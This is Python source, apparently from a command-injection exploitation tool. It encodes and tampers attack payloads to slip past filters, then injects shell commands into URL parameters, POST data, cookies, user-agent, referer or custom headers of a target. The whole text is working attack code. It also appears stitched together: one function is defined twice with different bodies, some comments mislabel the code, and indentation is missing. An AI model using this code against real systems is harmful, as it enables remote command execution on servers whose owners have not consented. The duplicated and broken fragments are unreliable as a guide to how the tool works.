def perform_payload_modification(payload):
for encode_type in list(set(settings.MULTI_ENCODED_PAYLOAD[::-1])):
# Add single quotes.
if encode_type == 'singlequotes':
from src.core.tamper import singlequotes
payload = singlequotes.transform(payload)
# Add caret symbol.
elif encode_type == 'backslashes':
from src.core.tamper import backslashes
payload = backslashes.transform(payload)
# Add caret symbol.
elif encode_type == 'caret':
from src.core.tamper import caret
payload = caret.transform(payload)
# Transfomation to nested command
elif encode_type == 'nested':
from src.core.tamper import nested
payload = nested.transform(payload)
for encode_type in list(set(settings.MULTI_ENCODED_PAYLOAD[::-1])):
# Encode payload to hex format.
if encode_type == 'base64encode':
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Encode payload to hex format.
if encode_type == 'hexencode':
from src.core.tamper import hexencode
payload = hexencode.encode(payload)
return payload
def perform_payload_encoding(payload):
for encode_type in settings.MULTI_ENCODED_PAYLOAD[::-1]:
# Encode payload to hex format.
if encode_type == 'base64encode':
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Encode payload to hex format.
if encode_type == 'hexencode':
from src.core.tamper import hexencode
payload = hexencode.encode(payload)
return payload
def perform_payload_modification(payload):
for encode_type in settings.MULTI_ENCODED_PAYLOAD[::-1]:
# Add single quotes.
if encode_type == 'singlequotes':
from src.core.tamper import singlequotes
payload = singlequotes.transform(payload)
for encode_type in settings.MULTI_ENCODED_PAYLOAD[::-1]:
# Encode payload to hex format.
if encode_type == 'base64encode':
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Encode payload to hex format.
if encode_type == 'hexencode':
from src.core.tamper import hexencode
payload = hexencode.encode(payload)
return payload
def check_injection(separator, payload, TAG, cmd, prefix, suffix,
whitespace, http_request_method, url, vuln_parameter,
OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = fb_payloads.cmd_execution_alter_shell(
separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd,
OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
# Encode payload to base64 format.
if settings.TAMPER_SCRIPTS['base64encode']:
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Encode payload to hex format.
elif settings.TAMPER_SCRIPTS['hexencode']:
from src.core.tamper import hexencode
payload = hexencode.encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
if settings.COMMENT in payload_msg:
payload = payload.split(settings.COMMENT)[0].strip()
payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
info_msg = "Executing the '" + cmd.split(
settings.COMMENT)[0].strip() + "' command... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
output_payload = "\n" + settings.print_payload(payload)
if settings.VERBOSITY_LEVEL >= 1:
output_payload = output_payload + "\n"
sys.stdout.write(output_payload)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter,
payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ", "%20")
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else:
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
parameter)
try:
data = json.loads(data, strict=False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = re.sub(settings.INJECT_TAG,
urllib.unquote(payload), parameter)
else:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response